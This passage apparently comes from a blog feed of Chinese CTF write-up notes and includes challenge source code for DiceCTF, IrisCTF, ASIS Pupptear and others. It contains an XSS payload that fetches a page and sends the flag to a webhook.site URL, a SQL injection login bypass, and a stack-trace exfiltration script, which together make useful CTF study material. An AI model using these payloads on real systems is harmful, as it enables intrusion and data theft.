style="color:#a6e22e">length</span> <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">1000</span>) <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;no&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">visit</span>(<span style="color:#a6e22e">code</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;visiting&#39;</span>); </span></span><span style="display:flex;"><span> } <span style="color:#66d9ef">else</span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">pathname</span> <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;/flag&#39;</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">url</span>.<span style="color:#a6e22e">searchParams</span>.<span style="color:#a6e22e">get</span>(<span style="color:#e6db74">&#39;token&#39;</span>) <span style="color:#f92672">!==</span> <span style="color:#a6e22e">token</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#e6db74">&#39;wrong&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">sleep</span>(<span style="color:#ae81ff">1000</span>); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">0</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(<span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">env</span>.<span style="color:#a6e22e">FLAG</span> <span style="color:#f92672">??</span> <span style="color:#e6db74">&#39;dice{flag}&#39;</span>); </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#a6e22e">res</span>.<span style="color:#a6e22e">end</span>(); </span></span><span style="display:flex;"><span>}).<span style="color:#a6e22e">listen</span>(<span style="color:#ae81ff">8080</span>); </span></span></code></pre></div><h3 id="visitjs">visit.js</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#66d9ef">import</span> <span style="color:#a6e22e">puppeteer</span> <span style="color:#a6e22e">from</span> <span style="color:#e6db74">&#39;puppeteer&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">browser</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">puppeteer</span>.<span style="color:#a6e22e">launch</span>({ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">pipe</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">args</span><span style="color:#f92672">:</span> [ </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--no-sandbox&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--disable-setuid-sandbox&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--js-flags=--noexpose_wasm,--jitless&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;--incognito&#39;</span> </span></span><span style="display:flex;"><span> ], </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">dumpio</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">headless</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;new&#39;</span> </span></span><span style="display:flex;"><span>}); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> [<span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>] <span style="color:#f92672">=</span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">argv</span>.<span style="color:#a6e22e">slice</span>(<span style="color:#ae81ff">2</span>); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">try</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">page</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">newPage</span>(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#66d9ef">goto</span>(<span style="color:#e6db74">&#39;http://127.0.0.1:8080&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">evaluate</span>((<span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>) =&gt; { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">localStorage</span>.<span style="color:#a6e22e">setItem</span>(<span style="color:#e6db74">&#39;token&#39;</span>, <span style="color:#a6e22e">token</span>); </span></span><span style="display:flex;"><span> document.<span style="color:#a6e22e">getElementById</span>(<span style="color:#e6db74">&#39;code&#39;</span>).<span style="color:#a6e22e">value</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">code</span>; </span></span><span style="display:flex;"><span> }, <span style="color:#a6e22e">token</span>, <span style="color:#a6e22e">code</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">click</span>(<span style="color:#e6db74">&#39;#submit&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">waitForFrame</span>(<span style="color:#a6e22e">frame</span> =&gt; <span style="color:#a6e22e">frame</span>.<span style="color:#a6e22e">name</span>() <span style="color:#f92672">==</span> <span style="color:#e6db74">&#39;sandbox&#39;</span>, { <span style="color:#a6e22e">timeout</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">1000</span> }); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">close</span>(); </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">catch</span>(<span style="color:#a6e22e">e</span>) { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">console</span>.<span style="color:#a6e22e">error</span>(<span style="color:#a6e22e">e</span>); </span></span><span style="display:flex;"><span>}; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">close</span>(); </span></span></code></pre></div><p>只等待1s</p> <pre tabindex="0"><code>await page.waitForFrame(frame =&gt; frame.name() == &#39;sandbox&#39;, { timeout: 1000 }); </code></pre><p>[CSS：在相对颜色语法中使用 color-mix 制作的颜色会导致选项卡崩溃并显示 SIGILL <a href="https://issues.chromium.org/issues/41490764">41490764] - Chromium</a></p> <pre tabindex="0"><code>&lt;!DOCTYPE html&gt; &lt;html lang=&#34;en&#34;&gt; &lt;head&gt; &lt;meta charset=&#34;UTF-8&#34;&gt; &lt;meta name=&#34;viewport&#34; content=&#34;width=device-width, initial-scale=1.0&#34;&gt; &lt;title&gt;CSS SIGILL Issue Repro&lt;/title&gt; &lt;style&gt; div { --c1: color-mix(in srgb, blue 50%, red); --c2: srgb(from var(--c1) r g b); background-color: var(--c2); } &lt;/style&gt; &lt;/head&gt; &lt;body&gt; &lt;div&gt;This should be purple&lt;/div&gt; &lt;/body&gt; &lt;/html&gt; </code></pre><p>终止报错</p> <pre tabindex="0"><code>&lt;link rel=&#34;stylesheet&#34; href=&#34;https://webhook.site/aee8bc6e-8b49-4193-9a96-291dc379b94f&#34;&gt;&lt;iframe src=&#34;http://localhost/flag&#34; csp=&#34;img-src &lt;https://*&gt;; defascript-srcult-sscript-srcrc &lt;https://*&gt;; repscript-srcort-uscript-srcri &lt;https://*&gt;;&#34; referrerpolicy=&#34;no-referrer&#34;&gt; &lt;img src=&#34;https://webhook.site/aee8bc6e-8b49-4193-9a96-291dc379b94f&#34;&gt; &lt;script&gt; flag=document.getElementsByTagName(&#34;pre&#34;)[0]; fetch(&#34;https://webhook.site/aee8bc6e-8b49-4193-9a96-291dc379b94f?flag=${encodeURIComponent(flag)}&#34;) .then(response =&gt; { // 检查响应状态 if (!response.ok) { throw new Error(`HTTP error! Status: ${response.status}`); } // 将响应转换为 JSON return response.json(); }) ); &lt;/script&gt; &lt;/iframe&gt; </code></pre><h2 id="dicedicegoose">dicedicegoose</h2> <p><img src="./image-20240206131947119-1707199656435-3.png" alt="image-20240206131947119"></p>/posts/xihulunjian/Mon, 05 Feb 2024 00:48:41 +0800/posts/xihulunjian/<h2 id="only_sql">only_sql</h2> <p>连上自己的数据库，load data写文件进去</p> <p>读到源码：</p> <pre tabindex="0"><code>&lt;?php error_reporting(0); // mine // $db_host = &#39;127.0.0.1&#39;; // $db_username = &#39;root&#39;; // $db_password = &#39;1q2w3e4r5t!@#&#39;; // $db_name = &#39;mysql&#39;; $db_host = $_POST[&#34;db_host&#34;]; $db_username = $_POST[&#34;db_username&#34;]; $db_password = $_POST[&#34;db_password&#34;]; $db_name = $_POST[&#34;db_name&#34;]; if(isset($db_host)){ try { $dsn = &#34;mysql:host=$db_host;dbname=$db_name&#34;; $pdo = new PDO($dsn, $db_username, $db_password); $pdo-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $_SESSION[&#39;dsn&#39;]=$dsn; $_SESSION[&#39;db_username&#39;]=$db_username; $_SESSION[&#39;db_password&#39;]=$db_password; } catch (Exception $e) { die($e-&gt;getMessage()); } } if(!isset($_SESSION[&#39;dsn&#39;])){ die(&#34;&lt;script&gt;alert(&#39;请先连接数据库&#39;);window.location.href=&#39;index.php&#39;&lt;/script&gt;&#34;); } ?&gt; &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;执行数据库命令&lt;/title&gt; &lt;link rel=&#34;stylesheet&#34; type=&#34;text/css&#34; href=&#34;style.css&#34;&gt; &lt;/head&gt; &lt;body&gt; &lt;div class=&#34;container&#34;&gt; &lt;h1&gt;执行数据库命令&lt;/h1&gt; &lt;form action=&#34;query.php&#34; method=&#34;post&#34;&gt; &lt;div class=&#34;form-group&#34;&gt; &lt;label for=&#34;db_command&#34;&gt;MySQL命令：&lt;/label&gt; &lt;input type=&#34;text&#34; id=&#34;db_command&#34; name=&#34;db_command&#34; style=&#34;width: 500px;&#34; required&gt; &lt;/div&gt; &lt;div class=&#34;form-group&#34;&gt; &lt;button type=&#34;submit&#34;&gt;执行命令&lt;/button&gt; &lt;/div&gt; &lt;/form&gt; &lt;div class=&#34;result&#34;&gt; &lt;?php if (isset($_POST[&#39;db_command&#39;])) { $db_command = $_POST[&#34;db_command&#34;]; $dsn=$_SESSION[&#39;dsn&#39;]; $db_username = $_SESSION[&#39;db_username&#39;]; $db_password = $_SESSION[&#39;db_password&#39;]; try { $pdo = new PDO($dsn, $db_username, $db_password,array(PDO::MYSQL_ATTR_LOCAL_INFILE =&gt; true)); $pdo-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $stmt = $pdo-&gt;prepare($db_command); $stmt-&gt;execute(); $result = $stmt-&gt;fetchAll(PDO::FETCH_ASSOC); if ($result) { echo &#34;&lt;h2&gt;执行结果：&lt;/h2&gt;&#34;; echo &#34;&lt;table&gt;&#34;; echo &#34;&lt;tr&gt;&#34;; foreach (array_keys($result[0]) as $column) { echo &#34;&lt;th&gt;$column&lt;/th&gt;&#34;; } echo &#34;&lt;/tr&gt;&#34;; foreach ($result as $row) { echo &#34;&lt;tr&gt;&#34;; foreach ($row as $value) { echo &#34;&lt;td&gt;$value&lt;/td&gt;&#34;; } echo &#34;&lt;/tr&gt;&#34;; } echo &#34;&lt;/table&gt;&#34;; } else { echo &#34;&lt;p&gt;没有结果返回。&lt;/p&gt;&#34;; } } catch (Exception $e) { echo &#34;&lt;p class=&#39;error-message&#39;&gt;执行错误：&#34; . $e-&gt;getMessage() . &#34;&lt;/p&gt;&#34;; } } ?&gt; &lt;/div&gt; &lt;/div&gt; &lt;/body&gt; &lt;/html&gt; </code></pre><p>eeee 没啥用</p> <p>直接读flag&mdash;&mdash;&mdash;明明说是sql结果flag不在数据库里面</p>/posts/telctf/Mon, 05 Feb 2024 00:45:06 +0800/posts/telctf/<h1 id="stress-release-service"><strong>Stress Release Service</strong></h1> <h2 id="stress-release-service-1"><strong>Stress Release Service:</strong></h2> <pre tabindex="0"><code>Chall name: - Stress Release Service Category: - Misc / Web Author: - tsug0d Description: For a better New Year, we are introducing a service that can help you reduce stress: &lt;http://192.53.173.71:8080&gt; . As our service is only available during the New Year, we are also providing you with a code for later use in material section. </code></pre><p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/8d78a98b-0a45-4355-a471-4e5956cf6fe5/StressReleaseService__give.zip">StressReleaseService__give.zip</a></p> <p>It is using <code>preg_match</code> to validate.</p> <p>为啥是misc题啊</p> <p>限制7个字符长度，可能需要点脑洞吧（</p> <p>tiniest php webshell?</p> <p><a href="https://www.pentestpartners.com/security-blog/the-tiniest-php-system-shell-ever/">https://www.pentestpartners.com/security-blog/the-tiniest-php-system-shell-ever/</a></p> <p>抽象，反引号或者想办法传参？</p> <p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/302a6103-2a30-446e-aba4-8686bf154b39/Untitled.txt">CTFshow_rce极限大挑战</a></p> <p>他不限制在7个字符可以看下面这张图<img src="/image-20240204224839567-1707065135959-1.png" alt="../TelCTF/image-20240204224839567"></p>/posts/rw-be/Mon, 05 Feb 2024 00:42:37 +0800/posts/rw-be/<h1 id="be-a-security-researcher">Be-a-Security-Researcher</h1> <p>开局login</p>/posts/irisctf/Mon, 05 Feb 2024 00:39:11 +0800/posts/irisctf/<h2 id="whats-my-password">What&rsquo;s My Password</h2> <p>sql injection</p> <pre tabindex="0"><code>{&#34;username&#34;:&#34;skat&#34;,&#34;password&#34;:&#34;\&#34; union select username,password from users where username=\&#34;skat\&#34;#&#34;} </code></pre><h2 id="lamenote">LameNote</h2> <pre tabindex="0"><code>Note challenges are lame so I made a lamer one. Flag matches irisctf{[a-z_]+} Admin will log in, make a note with the flag, then visit your link. (Sorry if the timeout is a bit broken on this challenge, there&#39;s no PoW on the admin bot so feel free to spam it a bit) nc lamenote-adminbot.chal.irisc.tf 10300 Hint! Please redownload if you downloaded server files at the start of the event. </code></pre><p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/e71696da-6929-44f6-843a-ade7f472026a/lamenote.tar.gz">lamenote.tar.gz</a></p>/posts/insomni-hack/Mon, 05 Feb 2024 00:00:09 +0800/posts/insomni-hack/<h2 id="insobank">InsoBank</h2> <pre tabindex="0"><code>by clZ We&#39;re launching a new online Bank today which is of course backed by crypto and AI which makes it better than any other banking system out there. It&#39;s not fully featured yet as you can only transfer money within your own accounts, but you can already see how superior it is to other systems: http://91.92.201.197:3000/ Source: here </code></pre><pre tabindex="0"><code>for (accountid,name,balance) in cursor.fetchall(): if balance &gt; 13.37: results[accountid] = {&#39;name&#39;: name, &#39;balance&#39;: balance, &#39;flag&#39;: FLAG} </code></pre>/posts/my2023total/Mon, 29 Jan 2024 13:38:57 +0800/posts/my2023total/<h1 id="2023">2023</h1> <p>emmm，我也想总结一下下（QWQ）我的2023。</p>/posts/qiangwangbei/Wed, 27 Dec 2023 00:26:21 +0800/posts/qiangwangbei/<h2 id="web">Web</h2> <p>给了docker，代码逻辑</p>/posts/chuhuibei/Mon, 25 Dec 2023 00:31:42 +0800/posts/chuhuibei/<h1 id="楚慧杯">楚慧杯</h1> <h2 id="eaaeval">eaaeval</h2> <p>打开题目，源码给了用户密码</p>/posts/asisctf/Mon, 25 Dec 2023 00:22:51 +0800/posts/asisctf/<h2 id="pupptear"><strong>Pupptear:</strong></h2> <p>***报错追踪文件名字</p> <pre tabindex="0"><code>Do you know what Puppeteer&#39;s friends call him when he cries? Pupptear... hahahaah [attachment](&lt;https://asisctf.com/tasks/pupptear_0ab53ea3b73da58a4d0854bf42ec1ea166283b3e.txz&gt;) nc 18.195.96.13 2000 Flag format for Pupptear: ^ASIS{[^{}]+}$ </code></pre><p><a href="https://prod-files-secure.s3.us-west-2.amazonaws.com/c378b070-6063-4137-81ee-f75f82009b81/7865afae-5d80-486d-b9d3-9239e8b4ff5e/pupptear.txz">pupptear.txz</a></p> <p>oh ok</p> <p>I get the concept.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-jsx" data-lang="jsx"><span style="display:flex;"><span><span style="color:#a6e22e">url</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">input</span>(<span style="color:#e6db74">&#39;input URL (b64ed): &#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span>(<span style="color:#a6e22e">not</span> <span style="color:#a6e22e">re</span>.<span style="color:#a6e22e">match</span>(<span style="color:#e6db74">&#39;^[A-Za-z0-9=+/]+$&#39;</span>,<span style="color:#a6e22e">url</span>))<span style="color:#f92672">:</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">print</span>(<span style="color:#e6db74">&#39;bad URL&#39;</span>) </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">close</span>(<span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">close</span>(<span style="color:#ae81ff">1</span>) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">close</span>(<span style="color:#ae81ff">2</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">containerName</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>.<span style="color:#a6e22e">join</span>(<span style="color:#a6e22e">random</span>.<span style="color:#a6e22e">choice</span>(<span style="color:#a6e22e">string</span>.<span style="color:#a6e22e">ascii_uppercase</span> <span style="color:#f92672">+</span> <span style="color:#a6e22e">string</span>.<span style="color:#a6e22e">digits</span>) <span style="color:#66d9ef">for</span> <span style="color:#a6e22e">_</span> <span style="color:#66d9ef">in</span> <span style="color:#a6e22e">range</span>(<span style="color:#ae81ff">0x10</span>)) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">system</span>(<span style="color:#a6e22e">f</span><span style="color:#e6db74">&#39;bash -c &#34;sleep 5 &amp;&amp; docker kill {containerName} 2&gt;/dev/null&#34; &amp;&#39;</span>) </span></span><span style="display:flex;"><span><span style="color:#a6e22e">os</span>.<span style="color:#a6e22e">system</span>(<span style="color:#a6e22e">f</span><span style="color:#e6db74">&#39;docker run --name {containerName} pupptear bash -c \\&#39;</span><span style="color:#f92672">/</span><span style="color:#a6e22e">ASIS</span><span style="color:#f92672">*</span><span style="color:#960050;background-color:#1e0010">/index.js {url}\\&#39; &#39;)</span> </span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">#</span><span style="color:#f92672">!</span><span style="color:#960050;background-color:#1e0010">/usr/bin/env node</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">puppeteer</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">require</span>(<span style="color:#e6db74">&#39;puppeteer&#39;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">const</span> <span style="color:#a6e22e">flag</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;flag{test-flag}&#39;</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">async</span> <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">visit</span>(<span style="color:#a6e22e">url</span>){ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">browser</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span>(<span style="color:#f92672">!</span><span style="color:#e6db74">/^https?:\\/</span><span style="color:#960050;background-color:#1e0010">\\</span><span style="color:#75715e">//.test(url)){ </span></span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span>; </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span>{ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">browser</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">puppeteer</span>.<span style="color:#a6e22e">launch</span>({ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">pipe</span><span style="color:#f92672">:</span> <span style="color:#66d9ef">true</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">args</span><span style="color:#f92672">:</span> [ </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--no-sandbox&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--disable-setuid-sandbox&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--js-flags=--noexpose_wasm,--jitless&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;--ignore-certificate-errors&#34;</span>, </span></span><span style="display:flex;"><span> ], </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">executablePath</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#34;/usr/bin/google-chrome-stable&#34;</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">headless</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;new&#39;</span> </span></span><span style="display:flex;"><span> }); </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">page</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">newPage</span>(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#66d9ef">goto</span>(<span style="color:#a6e22e">url</span>,{ <span style="color:#a6e22e">timeout</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">2000</span> }); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#a6e22e">page</span>.<span style="color:#a6e22e">waitForFunction</span>(<span style="color:#a6e22e">flag</span>=&gt;{ </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">let</span> <span style="color:#a6e22e">el</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">getElementById</span>(<span style="color:#e6db74">&#39;flag&#39;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span>(<span style="color:#f92672">!</span><span style="color:#a6e22e">el</span>) <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">false</span> </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">el</span>.<span style="color:#a6e22e">value</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">flag</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">true</span> </span></span><span style="display:flex;"><span> },{ <span style="color:#a6e22e">timeout</span><span style="color:#f92672">:</span> <span style="color:#ae81ff">2000</span> },<span style="color:#a6e22e">flag</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">await</span> <span style="color:#66d9ef">new</span> Promise(<span style="color:#a6e22e">r</span>=&gt;<span style="color:#a6e22e">setTimeout</span>(<span style="color:#a6e22e">r</span>,<span style="color:#ae81ff">3000</span>)); </span></span><span style="display:flex;"><span> }<span style="color:#66d9ef">catch</span>(<span style="color:#a6e22e">e</span>){} </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">try</span>{<span style="color:#66d9ef">await</span> <span style="color:#a6e22e">browser</span>.<span style="color:#a6e22e">close</span>();}<span style="color:#66d9ef">catch</span>(<span style="color:#a6e22e">e</span>){} </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">process</span>.<span style="color:#a6e22e">exit</span>(<span style="color:#ae81ff">0</span>) </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><p>get folder name? have no idea.</p> <p>need to check if we can get flag during page move delay<img src="./image-20240101163004369-1707063823030-1.png" alt="image-20240101163004369"></p> <p>fake flag. need to get folder name. i guess stacktrace from waitforfunction?</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-docker" data-lang="docker"><span style="display:flex;"><span><span style="color:#66d9ef">WORKDIR</span> <span style="color:#e6db74">/app</span><span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">COPY</span> ./stuff/ /app/<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> PUPPETEER_SKIP_DOWNLOAD<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> npm ci<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> chmod +x /app/index.js<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> useradd -m www<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> chmod <span style="color:#ae81ff">777</span> /home/www/ -R<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">ENV</span> FLAG<span style="color:#f92672">=</span>ASIS<span style="color:#f92672">{</span>test-flag<span style="color:#f92672">}</span><span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">RUN</span> mv /app/ /$FLAG/<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span>WORKDIR /<span style="color:#960050;background-color:#1e0010"> </span></span></span><span style="display:flex;"><span><span style="color:#66d9ef">USER</span> <span style="color:#e6db74">www</span><span style="color:#960050;background-color:#1e0010"> </span></span></span></code></pre></div><p>I guess yes.</p> <p>One way is to hook <code>Error</code> and find filename, but I have to install puppeteer for testing. I don’t know how things work internally for puppeteer😕</p> <p>If no one solves it I will try out sometime tomorrow.</p> <p>i dont know either. ppt is heavily coupled with chrome devtools, i guess the function execution is a part of devtools protocol.</p> <p>hook getElementById, read stacktrace.</p> <p>solved:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span><span style="color:#75715e">&lt;!DOCTYPE html&gt;</span> </span></span><span style="display:flex;"><span>&lt;<span style="color:#f92672">body</span>&gt; </span></span><span style="display:flex;"><span> &lt;<span style="color:#f92672">input</span> <span style="color:#a6e22e">type</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;text&#34;</span> <span style="color:#a6e22e">id</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;flag&#34;</span> /&gt; </span></span><span style="display:flex;"><span> &lt;<span style="color:#f92672">script</span>&gt; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">oldFunc</span> <span style="color:#f92672">=</span> document.<span style="color:#a6e22e">getElementById</span> </span></span><span style="display:flex;"><span> document.<span style="color:#a6e22e">getElementById</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">function</span>(<span style="color:#a6e22e">id</span>) { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">e</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">new</span> Error(); </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">const</span> <span style="color:#a6e22e">stack</span> <span style="color:#f92672">=</span> <span style="color:#a6e22e">e</span>.<span style="color:#a6e22e">stack</span>.<span style="color:#a6e22e">split</span>(<span style="color:#e6db74">&#39;\\n&#39;</span>); </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">fetch</span>(<span style="color:#e6db74">`</span><span style="color:#e6db74">${</span>document.<span style="color:#a6e22e">location</span>.<span style="color:#a6e22e">href</span><span style="color:#e6db74">}</span><span style="color:#e6db74">`</span>, { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">method</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;POST&#39;</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">headers</span><span style="color:#f92672">:</span> { </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#39;Content-Type&#39;</span><span style="color:#f92672">:</span> <span style="color:#e6db74">&#39;application/json&#39;</span> </span></span><span style="display:flex;"><span> }, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">body</span><span style="color:#f92672">:</span> <span style="color:#a6e22e">JSON</span>.<span style="color:#a6e22e">stringify</span>({ </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">id</span>, </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">stack</span> </span></span><span style="display:flex;"><span> }) </span></span><span style="display:flex;"><span> }) 